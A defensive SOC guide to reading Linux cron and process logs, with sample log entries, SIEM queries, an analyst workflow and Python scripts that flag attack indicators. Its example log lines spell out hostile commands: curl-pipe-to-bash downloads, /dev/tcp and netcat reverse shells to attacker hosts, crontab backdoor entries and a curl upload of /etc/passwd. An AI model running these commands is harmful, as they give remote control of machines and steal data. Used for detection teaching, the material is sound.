Cron logs and process execution logs are two of the most important Linux telemetry sources for detecting persistence, malware execution, privilege escalation, cryptominers, rootkits, lateral movement, and automated attacker activity.
Together, they expose what ran, when it ran, who ran it, and whether it was scheduled or triggered manually.
This chapter is a full-scale, ultra-practical SOC guide to cron logs and process logs using real examples, attacker footprints, SIEM queries, and investigation workflows.
Cron Logs (Scheduled Task Logs)
Cron is the Linux job scheduler. Attackers frequently use it to create persistent backdoors, run malware repeatedly, or maintain access even after reboots.
Cron logs tell the SOC:
- What scheduled tasks run on the system
- When a task executed
- Which user executed it
- Whether a job was modified
- Whether attackers added their own tasks
Cron logs live in:
Debian/Ubuntu:
/var/log/syslog
/var/log/cron.log (if enabled)
RHEL/CentOS:
/var/log/cron
Real-World Cron Log Examples
Below are raw entries exactly as SOC analysts see them.
1. Legitimate Cron Job
Jan 10 03:04:01 ubuntu CRON[1444]: (root) CMD (apt update)
2. Attacker Persistence via Cron
Jan 10 03:12:09 ubuntu CRON[1552]: (root) CMD (/usr/bin/curl http://185.33.10.2/m.sh | bash)
Interpretation:
- Root cron executed a malware download
- Classic cryptominer / botnet technique
3. Reverse Shell via Cron
Jan 10 03:11:00 ubuntu CRON[1540]: (root) CMD (/bin/bash -i >& /dev/tcp/185.22.91.22/4444 0>&1)
If attackers gain root, cron is one of the easiest persistence routes.
4. Malicious Script Execution Every Minute
CRON[2002]: (root) CMD (/tmp/.hidden/script.sh)
A job that fires every minute from a hidden /tmp directory = automated persistence.
5. Newly Added Cron Job (Attacker Action)
CMD (echo "* * * * * root /tmp/rootkit" >> /etc/crontab)
This is directly visible in syslog.
6. Malicious User Cron (Crontab -e)
CRON[1844]: (mayur) CMD (/home/mayur/.scripts/backdoor.py)
User-level persistence is common in low-privilege compromises.
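The six entries above share one shape, "(user) CMD (command)", so they can be triaged mechanically. The following is an added example (not code from the original chapter) that parses CRON syslog lines, applies the indicators discussed above (download-and-pipe, /dev/tcp or nc -e reverse shells, execution from /tmp or hidden directories, writes to cron files) and keeps only the hits. It also recognises the "crontab[PID]: (user) REPLACE (user)" lines that crontab(1) writes when a user edits a schedule with crontab -e; cron itself logs no CMD line for an edit, only for a job run, which is why the REPLACE line matters for "whether a job was modified". The sample lines are the ones quoted above; the timestamps on the shorter entries, the REPLACE line and the sshd line are constructed for the demo.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Job executions logged by the cron daemon, e.g.
#   Jan 10 03:12:09 ubuntu CRON[1552]: (root) CMD (/usr/bin/curl http://185.33.10.2/m.sh | bash)
# The timestamp/host prefix is optional so the shorter entries quoted in the chapter parse too.
CRON_CMD_RE = re.compile(
    r"^(?:(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) )?"
    r"CRON\[(?P<pid>\d+)\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$"
)

# Schedule edits made through crontab(1) are logged by that tool, not as CMD lines, e.g.
#   Jan 10 03:10:30 ubuntu crontab[1820]: (mayur) REPLACE (mayur)
CRONTAB_EDIT_RE = re.compile(
    r"^(?:(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) )?"
    r"crontab\[(?P<pid>\d+)\]: \((?P<user>[^)]+)\) (?P<action>REPLACE|DELETE) \((?P<target>[^)]+)\)$"
)

# Detection rules over the command text, reported in this order.
RULES = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("reverse-shell", re.compile(r"/dev/tcp/|\b(nc|ncat)\b.*\s-e\s")),
    ("exec-from-tmp-or-hidden", re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/|/\.[^/\s]")),
    ("crontab-modification", re.compile(r">>?\s*/etc/crontab\b|/var/spool/cron|/etc/cron\.")),
]


@dataclass
class CronEvent:
    timestamp: Optional[str]
    host: Optional[str]
    pid: int
    user: str
    command: str
    findings: List[str] = field(default_factory=list)


def parse_cron_line(line: str) -> Optional[CronEvent]:
    """Return a CronEvent for CRON/crontab syslog lines, None for any other line."""
    line = line.strip()
    m = CRON_CMD_RE.match(line)
    if m:
        cmd = m.group("cmd")
        findings = [name for name, rx in RULES if rx.search(cmd)]
        return CronEvent(m.group("ts"), m.group("host"), int(m.group("pid")),
                         m.group("user"), cmd, findings)
    m = CRONTAB_EDIT_RE.match(line)
    if m:
        # A REPLACE/DELETE is the only trace cron leaves of an edit made with crontab -e / -r,
        # so every one of them is reported as a modification.
        summary = f"{m.group('action')} crontab of {m.group('target')}"
        return CronEvent(m.group("ts"), m.group("host"), int(m.group("pid")),
                         m.group("user"), summary, ["crontab-modification"])
    return None


def triage(lines) -> List[CronEvent]:
    """Parse every line and keep only cron events that triggered at least one rule."""
    events = (parse_cron_line(line) for line in lines)
    return [e for e in events if e is not None and e.findings]


# Constructed sample: the chapter's entries plus a crontab(1) edit and an unrelated sshd line.
SAMPLE_LINES = [
    "Jan 10 03:04:01 ubuntu CRON[1444]: (root) CMD (apt update)",
    "Jan 10 03:12:09 ubuntu CRON[1552]: (root) CMD (/usr/bin/curl http://185.33.10.2/m.sh | bash)",
    "Jan 10 03:11:00 ubuntu CRON[1540]: (root) CMD (/bin/bash -i >& /dev/tcp/185.22.91.22/4444 0>&1)",
    "Jan 10 03:13:00 ubuntu CRON[2002]: (root) CMD (/tmp/.hidden/script.sh)",
    'Jan 10 03:14:00 ubuntu CRON[2010]: (root) CMD (echo "* * * * * root /tmp/rootkit" >> /etc/crontab)',
    "Jan 10 03:15:00 ubuntu CRON[1844]: (mayur) CMD (/home/mayur/.scripts/backdoor.py)",
    "Jan 10 03:10:30 ubuntu crontab[1820]: (mayur) REPLACE (mayur)",
    "Jan 10 03:15:01 ubuntu sshd[900]: Accepted publickey for mayur from 10.0.0.5 port 50222 ssh2",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LINES):
        print(f"{hit.timestamp} pid={hit.pid} user={hit.user} {hit.findings}: {hit.command}")
```

On a live host the same function can be fed `grep CRON /var/log/syslog` (Debian/Ubuntu) or /var/log/cron (RHEL/CentOS) line by line; the legitimate `apt update` job produces no findings and is dropped.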
Files That Store Cron Schedules
Attackers modify these locations:
System-wide cron jobs:
/etc/crontab
/etc/cron.hourly/
/etc/cron.daily/
/etc/cron.weekly/
/etc/cron.monthly/
User cron jobs:
/var/spool/cron/crontabs/<username>
SOC analysts check these paths whenever compromise is suspected.
Process Logs
Linux logs process creation and termination indirectly across:
- /var/log/syslog
- /var/log/messages
- Audit logs (/var/log/audit/audit.log)
- Kernel logs
- Process accounting
- systemd journal
These logs capture:
- Process execution
- Process IDs
- Parent processes
- Users launching commands
- Kernel activity
- Daemon activity
- Service restarts
Attackers leave clear traces here.
Real Process Execution Logs
1. Suspicious Bash Execution
Jan 10 03:44:12 ubuntu bash[2221]: executing ./rootkit.sh
The SOC immediately checks the referenced rootkit.sh.
2. Reverse Shell Execution
Jan 10 03:45:09 ubuntu bash[2331]: uid=0 gid=0 euid=0 executing /bin/bash -c "bash -i >& /dev/tcp/185.22.33.11/4444 0>&1"
Classic attacker signature.
3. Malware or Miner Execution
Jan 10 03:47:11 ubuntu systemd[1]: Started xmrig.service.
XMRig = cryptominer.
4. Python Backdoor Execution
python3 /tmp/backdoor.py
Backdoors often run from /tmp.
5. Service Manipulation
systemd[1]: Stopped ufw.service
Attacker disabling firewall = serious indicator.
6. Process Spawn History (journald)
systemd[2331]: Started Session 23 of user mayur.
Useful for reconstructing timelines.
How Attackers Abuse Cron & Processes
1. Persistence
echo "* * * * * root /tmp/bd.sh" >> /etc/crontab
2. Scheduled Malware Download
CRON[1233]: CMD (curl http://evil.com/m | bash)
3. Automated Recon
CRON[1322]: CMD (nmap 10.0.0.0/24)
4. Maintained Reverse Shell
CRON: CMD (nc -e /bin/bash attacker.com 4444)
5. Cryptomining
systemd: Started xmrig.
6. Hidden Backdoor Execution
bash[1555]: executing /etc/.hidden/.update
SIEM Queries (Practical)
Detect malicious cron jobs
program:CRON AND (CMD:*curl* OR CMD:*wget* OR CMD:*nc* OR CMD:*bash*)
Detect cron execution from /tmp or hidden directories
CMD:*/tmp/* OR CMD:*/.*
Detect reverse shells
message:"/dev/tcp"
Detect suspicious process execution
program:bash AND (message:*\.sh OR message:*python*)
Detect miner activity
message:*xmrig*
Detect firewall or security service tampering
program:systemd AND (message:"Stopped ufw.service" OR message:"Stopped firewalld")
Full Attack Timeline Using Cron & Process Logs
Step 1: Brute Force (auth.log)
Failed password for root from 185.77.22.14
Step 2: Attackers Gain Root
sudo: mayur : COMMAND=/bin/bash
Step 3: Backdoor Installed
bash: executing /tmp/backdoor.py
Step 4: Cron Persistence
CRON: (root) CMD (/usr/bin/python3 /tmp/backdoor.py)
Step 5: Miner Deployment
systemd: Started xmrig.service.
Step 6: Firewall Disabled
systemd[1]: Stopped ufw.service
Step 7: Exfiltration
bash: curl -X POST -F "file=@/etc/passwd" attacker.com/upload
Cron + process logs expose the entire compromise.
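The seven steps above come from different programs (sshd, sudo, bash, CRON, systemd) but all share the syslog line layout, so one parser can stitch them into a single ordered chain. This is an added example, not code from the chapter, serving both the process execution log entries listed earlier and the timeline above: it parses "timestamp host program[pid]: message", assigns each line a stage using the indicators the chapter names (failed logins, sudo to a shell, execution from /tmp, cron persistence, xmrig service start, ufw or firewalld stopped, curl uploading a file), sorts by time, and collapses runs of the same stage (the brute-force attempts) into one entry with a count. Syslog timestamps carry no year, so a year is passed in as an assumption; the sample lines are constructed from the chapter's steps with invented timestamps, PIDs and port numbers, and one unrelated cron line is included to show that it is left out of the chain.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional

# Generic syslog line: "<timestamp> <host> <program>[<pid>]: <message>" (pid optional).
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<prog>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?:\s+(?P<msg>.*)$"
)

# (stage, program or None for any program, pattern). First matching rule wins.
STAGE_RULES = [
    ("initial-access-bruteforce", "sshd", re.compile(r"Failed password for")),
    ("initial-access-login", "sshd", re.compile(r"Accepted (password|publickey) for")),
    ("privilege-escalation", "sudo", re.compile(r"COMMAND=/bin/(ba)?sh\b")),
    ("reverse-shell", None, re.compile(r"/dev/tcp/|\b(nc|ncat)\b.*\s-e\s")),
    ("exfiltration", "bash", re.compile(r"\bcurl\b.*(\s-F\s|\s-T\s|--upload-file|\s-d\s*@)")),
    ("backdoor-execution", "bash", re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/")),
    ("cron-persistence", "CRON", re.compile(r"CMD \(.*/(tmp|var/tmp|dev/shm)/")),
    ("miner-deployment", "systemd", re.compile(r"Started .*xmrig")),
    ("defense-evasion-firewall", "systemd", re.compile(r"Stopped (ufw|firewalld|iptables|nftables)")),
]


def classify(prog: str, msg: str) -> Optional[str]:
    """Map one syslog message to an attack stage, or None if no rule matches."""
    for stage, wanted_prog, rx in STAGE_RULES:
        if wanted_prog not in (None, prog):
            continue
        if rx.search(msg):
            return stage
    return None


def build_timeline(lines, year: int = 2025) -> List[Dict]:
    """Parse, classify and time-order lines; consecutive events of one stage are merged."""
    events = []
    for line in lines:
        m = SYSLOG_RE.match(line.strip())
        if not m:
            continue
        # Assumption: all lines fall in `year` (syslog omits it); no year rollover handling.
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        stage = classify(m.group("prog"), m.group("msg"))
        if stage:
            events.append((ts, stage, m.group("prog"), m.group("msg")))
    events.sort(key=lambda e: e[0])

    timeline: List[Dict] = []
    for ts, stage, prog, msg in events:
        if timeline and timeline[-1]["stage"] == stage:
            timeline[-1]["count"] += 1
            timeline[-1]["last"] = ts.isoformat()
        else:
            timeline.append({"stage": stage, "first": ts.isoformat(), "last": ts.isoformat(),
                             "count": 1, "source": prog, "evidence": msg})
    return timeline


def attack_chain(timeline: List[Dict]) -> List[str]:
    """The ordered list of stages, which is what gets escalated."""
    return [entry["stage"] for entry in timeline]


# Constructed sample built from the chapter's seven steps (timestamps, PIDs, ports invented).
SAMPLE_LINES = [
    "Jan 10 03:01:11 ubuntu sshd[871]: Failed password for root from 185.77.22.14 port 41022 ssh2",
    "Jan 10 03:01:14 ubuntu sshd[871]: Failed password for root from 185.77.22.14 port 41022 ssh2",
    "Jan 10 03:01:17 ubuntu sshd[871]: Failed password for root from 185.77.22.14 port 41022 ssh2",
    "Jan 10 03:02:40 ubuntu sshd[880]: Accepted password for mayur from 185.77.22.14 port 41100 ssh2",
    "Jan 10 03:03:05 ubuntu sudo:    mayur : TTY=pts/0 ; PWD=/home/mayur ; USER=root ; COMMAND=/bin/bash",
    "Jan 10 03:48:02 ubuntu systemd[1]: Stopped ufw.service.",          # deliberately out of order
    "Jan 10 03:05:30 ubuntu bash[2120]: executing /tmp/backdoor.py",
    "Jan 10 03:06:01 ubuntu CRON[2140]: (root) CMD (/usr/bin/python3 /tmp/backdoor.py)",
    "Jan 10 03:04:01 ubuntu CRON[1444]: (root) CMD (apt update)",        # benign, not classified
    "Jan 10 03:47:11 ubuntu systemd[1]: Started xmrig.service.",
    'Jan 10 03:50:19 ubuntu bash[2400]: curl -X POST -F "file=@/etc/passwd" attacker.com/upload',
]

if __name__ == "__main__":
    for entry in build_timeline(SAMPLE_LINES):
        print(f"{entry['first']} x{entry['count']} {entry['stage']:<26} {entry['source']}: {entry['evidence']}")
```

In practice the input is the concatenation of auth.log, syslog (or /var/log/cron) and `journalctl -o short` output for the window under investigation; the resulting chain is the artefact the analyst attaches when escalating.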
Analyst Workflow (Real SOC Procedure)
- Identify suspicious cron entries
- Extract script paths and analyze contents
- Identify process executions from /tmp/, hidden folders, or unknown paths
- Check auth logs for the attacker's initial access
- Review sudo/su logs for escalation
- Check systemd logs for service manipulation
- Check for miner or botnet execution
- Build a complete timeline
- Validate if compromise exists
- Escalate if malicious
This workflow is performed daily in SOC operations.
Intel Dump
- Cron logs capture scheduled tasks; attackers use cron for persistence and automation.
- Cron entries are found in /var/log/syslog, /var/log/cron, and /etc/crontab.
- Process logs capture script execution, shells, malware, miners, and service modification.
- Key indicators include curl/wget commands, reverse shells, execution from /tmp/, new cron entries, and service tampering.
- SIEM queries detect malicious cron jobs, suspicious process executions, reverse shells, miners, and unauthorized service stops.
- Cron + process logs reveal full attack chains including persistence, malware execution, and privilege misuse.